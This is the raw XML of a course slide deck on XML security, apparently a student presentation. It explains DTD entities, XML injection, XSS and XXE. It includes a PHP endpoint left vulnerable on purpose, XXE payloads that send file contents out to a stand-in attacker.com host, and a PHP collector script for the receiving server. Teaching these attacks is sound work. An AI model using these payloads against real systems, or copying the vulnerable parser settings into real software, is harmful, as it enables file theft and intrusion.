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5143500" cx="9144000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Nunito"/>
      <p:regular r:id="rId48"/>
      <p:bold r:id="rId49"/>
      <p:italic r:id="rId50"/>
      <p:boldItalic r:id="rId51"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Maven Pro"/>
      <p:regular r:id="rId52"/>
      <p:bold r:id="rId53"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Didact Gothic"/>
      <p:regular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Nunito-regular.fntdata"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide43.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Nuni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Nunito-boldItalic.fntdata"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Nunito-italic.fntdata"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/MavenPro-bold.fntdata"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/MavenPr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font" Target="fonts/DidactGothic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d618ac38f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d618ac38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d710182b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d710182b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d710182b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d710182b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d67afe3e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d67afe3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d67afe3e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d67afe3e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d7410e217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d7410e21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d4fbbf15d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d4fbbf15d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d710182b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d710182b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d7410e217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d7410e217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d7410e217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4d7410e217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d7410e217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4d7410e217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d4fbbf15d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d4fbbf15d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d7410e217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d7410e217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d710182b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4d710182b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d710182b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d710182b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d7410e21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d7410e2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4d7410e21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4d7410e21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d7410e21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d7410e21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d7410e21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4d7410e21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d7410e21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d7410e21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d7410e21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4d7410e21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4d7410e21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4d7410e21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d4fbbf15d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d4fbbf15d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4d7410e21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4d7410e21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d4fbbf15d_3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d4fbbf15d_3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4d67afe3e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4d67afe3e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4d67afe3e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4d67afe3e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4d67afe3e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4d67afe3e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4d67afe3e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4d67afe3e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4d67afe3e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4d67afe3e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d67afe3e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d67afe3e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d67afe3e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d67afe3e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4d4fbbf15d_3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4d4fbbf15d_3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d618ac38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d618ac38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4d7410e217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4d7410e217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4d4fbbf15d_3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4d4fbbf15d_3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4d7410e217_4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4d7410e217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4d67afe3e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4d67afe3e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d710182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d710182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d618ac38f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d618ac38f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d4fbbf15d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d4fbbf15d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d710182b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d710182b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d4fbbf15d_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d4fbbf15d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attacker.com/OOB.dtd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http://attacker.com?collect=contents-of-file" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="about:blank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hyperlink" Target="https://www.cvedetails.com/cve/CVE-2016-9318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hyperlink" Target="https://legalhackers.com/advisories/Google-AdWords-API-libraries-XXE-Injection-Vulnerability.html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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/cve/CVE-2018-1905/" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide34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cvedetails.com/cve/CVE-2018-1905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cvedetails.com/cve/CVE-2016-9318/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/cve/CVE-2016-9598/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/cve/CVE-2015-7241/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/cve/CVE-2017-7375/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/cve/CVE-2016-4449/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/cve/CVE-2018-11586/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/cve/CVE-2017-11457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hyperlink" Target="https://www.htbridge.com/blog/XXE-XML-injection.html" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.htbridge.com/blog/XXE-XML-injection.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.htbridge.com/blog/XXE-XML-injection.html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owasp.org/index.php/Testing_for_XML_Injection_(OTG-INPVAL-008)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snyk.io/blog/nokogiri-xxe-vulnerabilities/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://legalhackers.com/advisories/Google-AdWords-API-libraries-XXE-Injection-Vulnerability.html" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.htbridge.com/blog/XXE-XML-injection.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www-01.ibm.com/support/docview.wss?uid=ibm10738721" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10-2017_A4-XML_External_Entities_(XXE)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597" y="238750"/>
            <a:ext cx="7275678" cy="5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1515750" y="677550"/>
            <a:ext cx="3611100" cy="1752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4440000" dist="66675">
              <a:srgbClr val="000000">
                <a:alpha val="7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&lt;XML&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="9600">
              <a:solidFill>
                <a:srgbClr val="3C78D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502000" y="2305350"/>
            <a:ext cx="53751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idact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:rPr>
              <a:t>Vulnerabilities, Exploits and Prevention</a:t>
            </a:r>
            <a:endParaRPr sz="24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1616300" y="3348225"/>
            <a:ext cx="16713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Julian Sequeira</a:t>
            </a:r>
            <a:endParaRPr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Shayan Ghazi</a:t>
            </a:r>
            <a:endParaRPr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6877050" y="543550"/>
            <a:ext cx="9144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CSC427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Entities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="338" name="Google Shape;338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Like an alias or a variable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symbol that points to something else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be referenced throughout the document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When the XML parser encounters that symbol, it replaces it with what it’s pointing to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Entities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="344" name="Google Shape;344;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303800" y="1292325"/>
            <a:ext cx="7030500" cy="3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Parameter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Declared and referenced within the DTD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General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Declared in the DTD, referenced in the XML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Internal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Name-&gt;something defined in the DTD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External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Name -&gt; something stored elsewhere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Ex. a file in the file system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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1252900" y="2046700"/>
            <a:ext cx="4566900" cy="2175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DTD Entities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="351" name="Google Shape;351;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1417000" y="2120275"/>
            <a:ext cx="4402800" cy="19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&lt;!ELEMENT animal (species,name)&gt;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&lt;!ELEMENT species (#PCDATA)&gt;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&lt;!ELEMENT name (#PCDATA)&gt;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king "Lion"&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="FF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jungle “file:///etc/beasts”&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="FF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% tree “tropical”&gt;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2" name="Google Shape;352;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295500" y="1401375"/>
            <a:ext cx="49206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600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!DOCTYPE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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note SYSTEM "filename.dtd"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="16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3" name="Google Shape;353;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6120825" y="3033525"/>
            <a:ext cx="1905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filename.dtd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DTD Entities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="359" name="Google Shape;359;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358600" y="1746375"/>
            <a:ext cx="3969000" cy="218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&lt;?xml version="1.0" encoding="UTF-8"?&gt;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&lt;!DOCTYPE note SYSTEM "filename.dtd"&gt;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&lt;zoo&gt;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&lt;animal&gt;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&lt;species&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en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&amp;king;</a:t>
            </a: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&lt;/species&gt;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&lt;name&gt;Leo&lt;/name&gt;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&lt;/animal&gt;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&lt;/zoo&gt;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CFE2F3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0" name="Google Shape;360;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4862300" y="1747101"/>
            <a:ext cx="4028700" cy="2184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&lt;?xml version="1.0" encoding="UTF-8"?&gt;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&lt;!DOCTYPE note SYSTEM "filename.dtd"&gt;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&lt;zoo&gt;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&lt;animal&gt;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&lt;species&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en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Lion</a:t>
            </a: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&lt;/species&gt;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&lt;name&gt;Leo&lt;/name&gt;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&lt;/animal&gt;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&lt;/zoo&gt;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CFE2F3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61" name="Google Shape;361;p25"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4130000" y="2830851"/>
            <a:ext cx="926700" cy="1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DTD Entities Incentive</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="367" name="Google Shape;367;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303800" y="1739000"/>
            <a:ext cx="6515100" cy="29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If multiple organizations agree on a standard DTD, it allows their applications to view and interpret data that basic XML wouldn't be able to parse.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Exploits</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="373" name="Google Shape;373;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270350" y="1541741"/>
            <a:ext cx="7030500" cy="3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XML Injections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XXE (XML External Entities)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File Disclosure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XML Bomb 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Server Side Request Forgery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Remote Code Execution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Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="379" name="Google Shape;379;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303800" y="1685250"/>
            <a:ext cx="7030500" cy="30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Semantically similar to SQL Injection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be used to malform XML documents (i.e. databases)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Could cause denial of service! </a:t>
            </a:r>
            <a:endParaRPr sz="2000"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(depends on XML document’s purpose)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Privilege Escalation!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Malformed XML (DoS)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385" name="Google Shape;385;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="541775" y="1645375"/>
            <a:ext cx="8006100" cy="94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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558125" y="1597875"/>
            <a:ext cx="3000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&lt;node attrib='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$inputValue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'/&gt;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7" name="Google Shape;387;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3709475" y="1597450"/>
            <a:ext cx="18723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inputValue = foo'</a:t>
            </a:r>
            <a:endParaRPr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8" name="Google Shape;388;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6323800" y="1597450"/>
            <a:ext cx="236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&lt;node attrib=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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'foo''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89" name="Google Shape;389;p29"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="387" idx="3"/>
            <a:endCxn id="388" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5581775" y="1835800"/>
            <a:ext cx="741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0" name="Google Shape;390;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6608800" y="2136537"/>
            <a:ext cx="17955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MALFORMED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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="976525" y="3959625"/>
            <a:ext cx="7518000" cy="94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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="916325" y="2842625"/>
            <a:ext cx="7578300" cy="92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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2704475" y="2822677"/>
            <a:ext cx="22938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Username = foo</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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&lt;!--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="15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691225" y="3221973"/>
            <a:ext cx="17955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Comments</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5336575" y="2846552"/>
            <a:ext cx="31566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&lt;username&gt;foo</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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&lt;!--&lt;/username&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="15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2743440" y="3979227"/>
            <a:ext cx="22938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Username = foo</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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endParaRPr b="1" sz="15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7" name="Google Shape;397;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="858423" y="4369543"/>
            <a:ext cx="17955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Tag brackets</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5338013" y="4065752"/>
            <a:ext cx="31566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&lt;username&gt;foo</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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&lt;&lt;/username&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="15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6631075" y="3247050"/>
            <a:ext cx="1795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MALFORMED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321450" y="2027326"/>
            <a:ext cx="17955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Quotes</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6568262" y="4419192"/>
            <a:ext cx="17955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MALFORMED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Injections</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="407" name="Google Shape;4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536475"/>
            <a:ext cx="7373975" cy="9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800" y="2714600"/>
            <a:ext cx="7373975" cy="1293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30"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5318229" y="3794952"/>
            <a:ext cx="13500" cy="287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0" name="Google Shape;410;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4836754" y="4162927"/>
            <a:ext cx="1806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Privilege Escalation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Injections (XSS)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="416" name="Google Shape;416;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="989875" y="1444750"/>
            <a:ext cx="13644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&lt;html&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en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$HTMLCode</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en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&lt;/html&gt;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7" name="Google Shape;417;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="909650" y="2327625"/>
            <a:ext cx="78054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$HTMLCode = </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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&lt;![CDATA[&lt;]]&gt;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script</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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&lt;![CDATA[&gt;]]&gt;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alert('xss')</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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&lt;![CDATA[&lt;]]&gt;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/script</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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&lt;![CDATA[&gt;]]&gt;</a:t>
            </a:r>
            <a:endParaRPr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8" name="Google Shape;418;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1023325" y="3265500"/>
            <a:ext cx="34512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Evaluates as…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&lt;html&gt;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&lt;script&gt;alert('XSS')&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr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&lt;/html&gt;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19" name="Google Shape;4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375" y="3222325"/>
            <a:ext cx="2138275" cy="13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Background</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287" name="Google Shape;287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is XML?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does an XML parser do?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is a DTD?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is an entity?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Demo Time!</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="425" name="Google Shape;4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875" y="1597875"/>
            <a:ext cx="4321100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XXE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="431" name="Google Shape;431;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1252900" y="1892175"/>
            <a:ext cx="6318600" cy="270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&lt;br&gt;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&lt;?php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libxml_disable_entity_loader (false);</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="FF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$xmlfile = file_get_contents('php://input');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$dom = new DOMDocument();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$dom-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en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loadXML</a:t>
            </a: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($xmlfile, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en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LIBXML_NOENT</a:t>
            </a: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| </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF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LIBXML_DTDLOAD</a:t>
            </a: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$creds = simplexml_import_dom($dom);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$user = $creds-&gt;user;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$pass = $creds-&gt;pass;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echo "\n\nYou have logged in as user $user\n";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?&gt;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2" name="Google Shape;432;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1244075" y="1464800"/>
            <a:ext cx="28560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index.php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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5413050" y="900200"/>
            <a:ext cx="2856000" cy="992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&lt;creds&gt;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	&lt;user&gt;Bob&lt;/user&gt;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	&lt;pass&gt;password&lt;/pass&gt;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&lt;/creds&gt;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Disclosure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="439" name="Google Shape;439;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1350625" y="19833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CFE2F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524300"/>
            <a:ext cx="73152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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2184450" y="4565100"/>
            <a:ext cx="47751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Taken from: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>https://www.acunetix.com/blog/articles/xml-external-entity-xxe-vulnerabilities/</a:t>
            </a:r>
            <a:endParaRPr sz="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Disclosure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="447" name="Google Shape;447;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143250" y="1963275"/>
            <a:ext cx="7030500" cy="24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if the attacker’s desired file is not considered a well-formed XML document?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can convert the file’s contents into a base64 encoding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Base64 is always treated as well-formed XML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Disclosure- Out of Band</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="453" name="Google Shape;4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555" y="1772475"/>
            <a:ext cx="787550" cy="12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500" y="1926300"/>
            <a:ext cx="999300" cy="999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36"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2501525" y="2407875"/>
            <a:ext cx="1177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6" name="Google Shape;456;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6507950" y="2024700"/>
            <a:ext cx="1542300" cy="802500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF99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XML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PARSER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0575" y="3697325"/>
            <a:ext cx="885775" cy="133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36"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5063225" y="2434625"/>
            <a:ext cx="1170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9" name="Google Shape;45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7725" y="4290025"/>
            <a:ext cx="711226" cy="7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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2688800" y="2575850"/>
            <a:ext cx="621900" cy="507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XXE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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5337575" y="2575850"/>
            <a:ext cx="621900" cy="507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XXE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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7428350" y="2925600"/>
            <a:ext cx="621900" cy="507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XXE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050" y="3569800"/>
            <a:ext cx="621900" cy="62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4" name="Google Shape;464;p36"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="456" idx="2"/>
            <a:endCxn id="457" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4949900" y="2033700"/>
            <a:ext cx="1535700" cy="31227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65" name="Google Shape;46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1387" y="3661800"/>
            <a:ext cx="1144125" cy="11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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6536150" y="4034375"/>
            <a:ext cx="1437900" cy="5076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File System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Disclosure- Out of Band</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="472" name="Google Shape;472;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1096800" y="3257350"/>
            <a:ext cx="6318600" cy="1685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3" name="Google Shape;473;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1199400" y="3257350"/>
            <a:ext cx="61134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&lt;?php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if (isset($_REQUEST["collect"])) {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	echo $_REQUEST["collect"];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	$file = 'goodies.txt';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	file_put_contents($file, $_REQUEST["collect"]);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?&gt;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4" name="Google Shape;474;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1199400" y="2876100"/>
            <a:ext cx="47421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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hp program running on attacker controlled server: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75" name="Google Shape;475;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="829375" y="1511625"/>
            <a:ext cx="70029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if the victim server does not send the attacker a response?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attacker can use external entities to get the victim server to send a request to an attacker controlled server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Disclosure- Out of Band</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="481" name="Google Shape;481;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="187300" y="1391125"/>
            <a:ext cx="58992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&lt;!ENTITY % file SYSTEM “file://filepath”&gt;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&lt;!ENTITY % dtd SYSTEM “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http://attacker.com/evil.dtd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”&gt;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%dtd;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2" name="Google Shape;482;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="224400" y="2581425"/>
            <a:ext cx="86952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&lt;!ENTITY % var “&lt;!ENTITY name SYSTEM ‘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http://attacker.com?collect=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%file;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’&gt;”&gt;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3" name="Google Shape;483;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="240800" y="4447875"/>
            <a:ext cx="71970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&lt;!ENTITY name SYSTEM “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5"/>
              </a:rPr>
              <a:t>http://attacker.com?collect=contents-of-file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”&gt;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84" name="Google Shape;484;p38"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755800" y="2180488"/>
            <a:ext cx="341100" cy="414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5" name="Google Shape;485;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="232650" y="3504850"/>
            <a:ext cx="8678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&lt;!ENTITY % var “&lt;!ENTITY name SYSTEM ‘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6"/>
              </a:rPr>
              <a:t>http://attacker.com?collect=contents-of-file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’&gt;”&gt;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%var;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86" name="Google Shape;486;p38"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7016300" y="3009850"/>
            <a:ext cx="133800" cy="45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7" name="Google Shape;487;p38"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="842750" y="4113450"/>
